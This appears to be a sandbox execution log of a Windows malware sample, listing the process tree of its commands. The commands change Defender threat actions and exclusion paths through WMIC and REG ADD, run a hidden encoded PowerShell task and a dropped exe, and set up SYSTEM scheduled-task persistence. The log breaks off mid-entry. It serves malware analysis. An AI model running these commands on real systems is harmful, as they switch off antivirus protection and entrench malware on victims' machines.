C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2756

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:4060

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1512

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4092

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:2736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:1348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:2784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:3732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:3984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:2292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnDWhryCSIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnDWhryCSIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XpqoUDXlJoUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XpqoUDXlJoUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mrDIPifxyaTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mrDIPifxyaTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\piLDiRqvGTKTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\piLDiRqvGTKTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qDCCGhOyU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qDCCGhOyU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xoWQddOigjsPCTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xoWQddOigjsPCTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ONbcuvmDOvHMWTXn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ONbcuvmDOvHMWTXn\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3148

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3128

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xoWQddOigjsPCTVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xoWQddOigjsPCTVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX /t REG_DWORD /d 0 /reg:32
3⤵
PID:2060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX /t REG_DWORD /d 0 /reg:64
3⤵
PID:3980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM /t REG_DWORD /d 0 /reg:32
3⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM /t REG_DWORD /d 0 /reg:64
3⤵
PID:2328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ONbcuvmDOvHMWTXn /t REG_DWORD /d 0 /reg:32
3⤵
PID:2868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ONbcuvmDOvHMWTXn /t REG_DWORD /d 0 /reg:64
3⤵
PID:2192

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gvCcgpwln" /SC once /ST 05:05:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2300

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gvCcgpwln"
2⤵
PID:3864

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gvCcgpwln"
2⤵
PID:2304

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "lJLWniCkwZbjhapzm" /SC once /ST 12:17:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\cwWqefp.exe\" 7V /site_id 767 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3884

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "lJLWniCkwZbjhapzm"
2⤵
PID:3644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1516

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1736

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3832

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3820

C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\cwWqefp.exe
C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\cwWqefp.exe 7V /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:2748

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1724

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2516

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3636

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3848

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3828

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:4028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3144

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3148

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:580

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1524

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1640

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bkckNrBYOjfprwtEPo"
2⤵
PID:500

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:3220

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:1316

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1164

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qDCCGhOyU\sIPZDS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "pMLebdOaFqOcGSU" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2980

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "pMLebdOaFqOcGSU2" /F /xml "C:\Program Files (x86)\qDCCGhOyU\ICJrDSo.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3604

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pMLebdOaFqOcGSU"
2⤵
PID:2752

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pMLebdOaFqOcGSU"
2⤵
PID:2232

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GxGlmfAoAweICH" /F /xml "C:\Program Files (x86)\mrDIPifxyaTU2\BgzzAiI.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1248

C:\Windows\SysWOW64\schtasks.exe
